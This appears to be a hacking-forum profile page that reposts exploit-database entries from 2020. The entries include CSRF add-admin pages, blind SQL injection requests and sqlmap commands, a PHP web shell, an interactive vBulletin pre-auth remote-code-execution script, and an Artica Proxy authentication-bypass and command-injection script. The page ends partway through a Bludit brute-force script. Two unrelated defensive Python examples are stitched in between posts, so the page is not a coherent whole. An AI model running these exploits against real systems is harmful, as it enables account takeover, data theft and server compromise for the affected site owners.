
Everything posted by HireHackking
-
All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
# Discovery by: LiquidWorm
# Discovery Date: 2020-08-05
# Vendor Homepage: https://www.all-dynamics.de

<!DOCTYPE html>
<!--

All-Dynamics Software enlogic:show Digital Signage System 2.0.2 CSRF Add Admin


Vendor: All-Dynamics Software GmbH
Product web page: https://www.all-dynamics.de
Affected version: 2.0.2 (Build 2098)
                  ILP32W 0/1/3/1597919619

Summary: Bring communication with your customers, guests or employees to a new
level. You can design content individually and uncomplicated centrally and
simply present it in different locations. Whether on large displays, steles,
digital signs or on a projector, with enlogic:show your content will appear on
the selected display in a calendar-controlled and precise manner.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php

Tested on: enlogic:show server
           Microsoft Windows Server 2019
           Microsoft Windows Server 2016
           Microsoft Windows Server 2012
           Microsoft Windows 10
           GNU/Linux
           Apache
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5576
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5576.php


21.07.2020

-->

<html>
<body onload="runcsrf()">
<h2>Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.</h2>
<h1>Global: Superior rolebased rights.</h1>
<form name="saveuser" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame0">
  <input type="hidden" name="SAVECMD" value="usr_generic" />
  <input type="hidden" name="NEWUSER" value="1" />
  <input type="hidden" name="USERNAME" value="Intruder" />
  <input type="hidden" name="USERFULLNAME" value="ZSL" />
  <input type="hidden" name="USERTAGS" value="tags" />
  <input type="hidden" name="USEREMAIL" value="csrf@zsl.be" />
  <input type="hidden" name="USERPHONE" value="333-222-1111" />
  <input type="hidden" name="PWEXPIRE" value="0" />
  <input type="hidden" name="NEWPW1" value="Pa$$w0rd!" />
  <input type="hidden" name="NEWPW2" value="Pa$$w0rd!" />
  <input type="hidden" name="USERLANG" value="en" />
  <input type="hidden" name="STARTSCREEN" value="display.calendar" />
  <input type="hidden" name="USERCUSTIMEOUT" value="20" />
</form>
<form name="addadmin" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame1">
  <input type="hidden" name="SAVECMD" value="usr_rights" />
  <input type="hidden" name="SYSFLAGS[]" value="TYPE_SYSADMIN" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<script>
function runcsrf() {
  document.saveuser.submit();
  document.addadmin.submit();
}
</script>
</body>
</html>
-
Daily Expenses Management System 1.0 - 'item' SQL Injection
# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
# Date: 2020-08-05
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Add Expenses
# Vulnerable file: add-expense.php
# Vulnerable parameter :
  - item
  - costitem
# PoC Url : http://example.com/dets/add-expense.php
  Method : Post

# Burpsuite Requests

POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/add-expense.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=

# Payload

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=

# Sqlmap Command

sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Edit Profile
# Vulnerable file: user-profile.php
# Vulnerable parameter :
  - fullname
# PoC Url : http://example.com/dets/user-profile.php
  Method : Post

# Burpsuite Requests

POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/user-profile.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=

# Payload

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit=

# Sqlmap Command

sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Expense Reports
# Vulnerable file:
  - expense-monthwise-reports-detailed.php
  - expense-datewise-reports.php
  - expense-yearwise-reports.php
# Vulnerable parameter :
  - fromdate
  - todate
# PoC Url : http://example.com/dets/expense-monthwise-reports-detailed.php
  Method : Post

# Burpsuite Requests

POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/expense-yearwise-reports.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=

# Payload

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=

# Sqlmap Command

sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs

-------------------------------------------------------------------------------------------------------------------------------------

# Feature: Login Page
# Bypass Login Using SQLi on Admin/Member
# Vulnerable file: index.php
# PoC URL : https://example.com/dets/index.php

Logging in with following details:
  - Payload : "' OR 1=1 -- '"@sql.id

# Burp Requests

POST /dets/index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/index.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1

email="' OR 1=1 -- '"@sql.id&password=1337&login=login
-
BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
# Discovery Date: 2020-07-31
# Response from BarcodeOCR Support: 08/03/2020
# Exploit Author: Daniel Bertoni
# Vendor Homepage: https://www.barcode-ocr.com/
# Version: 19.3.6
# Tested on: Windows Server 2016, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

BarcodeOCR    Auto    BarcodeOCR    C:\Program Files (x86)\BarcodeOCR\Service.exe

# Service info:

C:\sc qc CodeMeter.exe
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BarcodeOCR
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\BarcodeOCR\Service.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : BarcodeOCR
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

# Exploit:

A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.
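The wmic/sc checks in the post above can be turned into an automated audit. The following is an added example (not part of the post and not BarcodeOCR code): it parses rows shaped like the wmic output quoted above, flags auto-start services whose unquoted binary path contains a space, and emits the quoted path plus the `sc config ... binPath=` command an administrator would use to fix it. The service rows are constructed sample data.

```python
# Constructed sample rows, modelled on the wmic output quoted in the post:
# (Name, DisplayName, PathName, StartMode). Not real inventory data.
SAMPLE_SERVICES = [
    ("BarcodeOCR", "BarcodeOCR", r"C:\Program Files (x86)\BarcodeOCR\Service.exe", "Auto"),
    ("GoodSvc", "Good Service", r'"C:\Program Files\Good Vendor\svc.exe" --run', "Auto"),
    ("NoSpace", "No Space", r"C:\Tools\nospace.exe", "Auto"),
    ("ManualSvc", "Manual Vendor", r"C:\Program Files\Manual Vendor\m.exe", "Manual"),
    ("WinSvc", "Windows Tool", r"C:\Windows\Sys Tools\t.exe -k svc", "Auto"),
]


def _split_exe(pathname):
    """Split a service PathName into (executable part, trailing arguments),
    cutting after the first '.exe' regardless of case."""
    p = pathname.strip()
    idx = p.lower().find(".exe")
    if idx < 0:
        return p, ""
    return p[:idx + 4], p[idx + 4:]


def is_unquoted_path(pathname):
    """True when the executable path is not wrapped in quotes and contains a
    space: the service control manager then has to guess where the file name
    ends, which is the condition the post describes."""
    exe, _args = _split_exe(pathname)
    return not exe.startswith('"') and " " in exe


def quoted_form(pathname):
    """The remediation: quote the executable, keep any arguments as they are."""
    exe, args = _split_exe(pathname)
    if exe.startswith('"'):
        return pathname.strip()
    return '"%s"%s' % (exe, args)


def sc_fix_command(name, pathname):
    """Command line for sc.exe: the inner quotes are escaped with backslashes
    and 'binPath=' must be followed by a space."""
    exe, args = _split_exe(pathname)
    return 'sc config %s binPath= "\\"%s\\"%s"' % (name, exe, args)


def find_unquoted_services(rows, skip_windows_dir=True):
    """Mirror the post's wmic | findstr pipeline: auto-start services only,
    optionally ignoring C:\\Windows, returning (name, pathname, fixed) tuples."""
    findings = []
    for name, _display, pathname, startmode in rows:
        if startmode.lower() != "auto":
            continue
        if skip_windows_dir and pathname.lower().lstrip('"').startswith("c:\\windows\\"):
            continue
        if is_unquoted_path(pathname):
            findings.append((name, pathname, quoted_form(pathname)))
    return findings


if __name__ == "__main__":
    for name, path, fixed in find_unquoted_services(SAMPLE_SERVICES):
        print("[!] %s: %s" % (name, path))
        print("    fix: %s" % sc_fix_command(name, path))
```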
-
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)
# Exploit Title: ManageEngine ADSelfService Plus 6000 – Unauthenticated Remote Code Execution
# Date: 2020-08-08
# Exploit Author: Bhadresh Patel
# Vendor link: https://www.manageengine.com/company.html
# Version: ADSelfService Plus build < 6003
# CVE : CVE-2020-11552

This is an article with PoC exploit video of ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Title:
====
ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability

CVE ID:
=======
CVE-2020-11552

Date:
====
08/08/2020 (dd/mm/yyyy)

Vendor:
======
As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget. ManageEngine crafts comprehensive IT management software with a focus on making your job easier. Our 90+ products and free tools cover everything your IT needs, at prices you can afford. From network and device management to security and service desk software, we're bringing IT together for an integrated, overarching approach to optimize your IT.

Vendor link: https://www.manageengine.com/company.html

Vulnerable Product:
==============
ManageEngine ADSelfService Plus is an integrated self-service password management and single sign on solution. This solution helps domain users perform self-service password reset, self-service account unlock, employee self-update of personal details (e.g., mobile numbers and photos) in Microsoft Windows Active Directory. ADSelfService Plus also provides users with secure, one-click access to all SAML-supported enterprise applications, including Office 365, Salesforce, and G Suite, through Active Directory-based single sign-on (SSO). For improved security, ADSelfService Plus offers Windows two-factor authentication for all remote and local logins. Administrators find it easy to automate password resets, account unlocks while optimizing IT expenses associated with help desk calls.

Product link: https://www.manageengine.com/products/self-service-password/?meadsol

Abstract:
=======
A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability.

Report-Timeline:
=============
27/02/2020: Vendor notified
27/02/2020: Vendor response
28/02/2020: Marked duplicate
11/03/2020: Patch released
23/03/2020: Vendor responded regarding patch release update
26/03/2020: Patch tested and found that it partially fixed the issue. Reported back to the vendor.
18/04/2020: Shared updated report with new PoC
22/04/2020: Vendor acknowledged the issue
24/07/2020: Patch released ( https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6003-release-faceid-support )
08/08/2020: Public disclosure

Affected Software Version:
=============
< ADSelfService Plus build 6003

Exploitation-Technique:
===================
Remote

Severity Rating (CVSS):
===================
9.8 (Critical) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Details:
=======
A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability.

ManageEngine ADSelfService Plus thick client enables a user to perform self-service like password reset, self-service account unlock, etc by using self-service option on windows login screen. Upon selecting this option, ManageEngine ADSelfService Plus thick client software will be launched which will connect to a remote ADSelfServicePlus server to facilitate the self-service operations.

A security alert can/will be triggered when “an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client”. Or, “a (default) self-signed SSL certificate is configured on ADSelfService Plus server”.

“View Certificate” option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through “C:\windows\system32\”, a cmd.exe can be launched as a SYSTEM.

*PoC Video:*
https://www.youtube.com/watch?v=slZRXffswnQ

01:00 to 05:30 : Setup the environment
05:30 to 06:34 : Exploitation

Credits:
=======
Bhadresh Patel

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Regards,
-Bhadresh
-
Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-09
# Vendor Homepage: https://oswapp.com
# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# CWE-352: Cross-Site Request Forgery (CSRF)
# CVSS Base Score: 7.5
# Impact Subscore: 5.9
# Exploitability Subscore: 1.6
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's
# Warehouse Inventory System v1.0 allows remote attackers to change the admins password
# via authenticated admin visiting a third-party site.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST">
      <input type="hidden" name="password" value="Boku123!" />
      <input type="hidden" name="update-pass" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-01
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip
# Version: 1.4.7
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-17463


1. Description:
----------------------

Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req
Then run SQLmap to extract the data from the database:

sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent


3. Example payload:
----------------------

(time-based blind)

/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0


4. Burpsuite request:
----------------------

GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529
Upgrade-Insecure-Requests: 1


5. Timeline:
----------------------

2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7
2020-08-02: Reported vulnerability to vendor
2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8
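The `col` parameter above is a sort column, which is why the usual fix (bound parameters) does not apply: SQL identifiers cannot be bound, so the value has to be checked against an allowlist. The following is an added example, not Fuel CMS code: an interpolating query builder that reproduces the bug class beside an allowlisted one, run against an in-memory SQLite table so the effect is observable. The table, its columns and the allowlist are constructed for the example.

```python
import sqlite3

# Constructed allowlist of sortable columns; the real Fuel CMS column set is
# not given in the post, so these names are assumptions for the example.
ALLOWED_COLS = {"id", "location", "layout", "published", "date_added"}
ALLOWED_ORDER = {"asc", "desc"}


def build_list_query_unsafe(col, order):
    """The vulnerable shape: the sort column and direction are interpolated
    verbatim, so any SQL expression sent as 'col' is evaluated by the database.
    This reproduces the bug class only; it is not Fuel CMS's own code."""
    return "SELECT id, location FROM pages ORDER BY %s %s" % (col, order)


def build_list_query(col, order="asc"):
    """Hardened: identifiers cannot be bound as parameters, so the column is
    checked against an allowlist and quoted, and the direction is restricted
    to the two keywords. Anything else is rejected before reaching the DB."""
    if col not in ALLOWED_COLS:
        raise ValueError("sort column not allowed: %r" % col)
    if order.lower() not in ALLOWED_ORDER:
        raise ValueError("sort order not allowed: %r" % order)
    return 'SELECT id, location FROM pages ORDER BY "%s" %s' % (col, order.upper())


def _demo_db():
    """Constructed in-memory table standing in for the pages listing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, location TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1, "home"), (2, "about"), (3, "contact")])
    return conn


def run(query):
    """Execute a query against a fresh demo table and return the rows."""
    return [tuple(r) for r in _demo_db().execute(query)]


if __name__ == "__main__":
    # SQLite has no SLEEP(), so a subselect stands in for the post's payload:
    # the unsafe builder still lets the injected expression run.
    injected = "location AND (SELECT 1 FROM pages)"
    print(run(build_list_query_unsafe(injected, "asc")))
    try:
        build_list_query("location AND (SELECT 1340 FROM (SELECT(SLEEP(5)))ULQV)")
    except ValueError as err:
        print("rejected:", err)
    print(run(build_list_query("location")))
```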
-
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2020-07-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: N/A


1. Description:
----------------------

CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.


2. Proof of Concept:
----------------------

- Create .phtml or .ptar file with malicious PHP payload;
- Upload .phtml or .ptar file in the 'File Manager' module;
- Click on the uploaded file to perform remote code execution.


3: Example payload:
----------------------

<?php system($_GET['cmd']);?>


4a: Burp request:
----------------------

GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
Host: 10.10.10.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v
Upgrade-Insecure-Requests: 1


4b: Burp response:
----------------------

HTTP/1.1 200 OK
Date: Thu, 30 Jul 2020 23:14:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html; charset=UTF-8

uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None

# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.

#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex
import argparse
import requests
import sys

def run_exploit(vb_loc, shell_cmd):
    post_data = {'subWidgets[0][template]' : 'widget_php',
                 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd}
    r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
    return r.text

ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception as e:
        sys.exit(str(e))
-
Artica Proxy 4.3.0 - Authentication Bypass
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506

import requests
import argparse
from bs4 import BeautifulSoup


def bypass_auth(session, args):
    login_endpoint = "/fw.login.php?apikey="
    payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

    print("[+] Bypassing authentication...")
    session.get(args.host + login_endpoint + payload, verify=False)

    return session


def run_command(session, args):
    cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)

    print("[+] Running command: {}".format(args.command))
    response = session.post(args.host + cmd_endpoint, verify=False)

    soup = BeautifulSoup(response.text, "html.parser")
    print(soup.find_all("code")[1].get_text())


def main():
    parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
    parser.add_argument(
        "--host",
        help="The host to target. Format example: https://host:port",
    )
    parser.add_argument("--command", help="The command to run")
    args = parser.parse_args()

    if not args.host or not args.command:
        parser.print_help()
        exit(0)

    session = requests.Session()
    session = bypass_auth(session, args)
    run_command(session, args)


if __name__ == "__main__":
    main()
-
GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 2020-08-12
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.

## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password

## CSRF POST Form Method

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
      <input type="hidden" name="usernamec" value="<ADMIN>" />
      <input type="hidden" name="useremail" value="ADMIN@DOMAIN.LOCAL" />
      <input type="hidden" name="ntimezone" value="" />
      <input type="hidden" name="userlng" value="en_US" />
      <input type="hidden" name="userpassword" value="<PASSWORD>" />
      <input type="hidden" name="usereditor" value="1" />
      <input type="hidden" name="Landing" value="" />
      <input type="hidden" name="add-user" value="Add New User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
#!/usr/bin/env ruby

## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
## Author: noraj (Alexandre ZANNI)
## Author website: https://pwn.by/noraj/
## Date: 2020-08-16
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: <= 3.9.2
## Tested on: Bludit Version 3.9.2

# Vulnerability
## Discoverer: Rastating
## Discoverer website: https://rastating.github.io/
## CVE: CVE-2019-17240
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240
## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
## Patch: https://github.com/bludit/bludit/pull/1090

require 'httpclient'
require 'docopt'

# dirty workaround to remove this warning:
# Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
# see https://github.com/nahi/httpclient/issues/252
class WebAgent
  class Cookie < HTTP::Cookie
    def domain
      self.original_domain
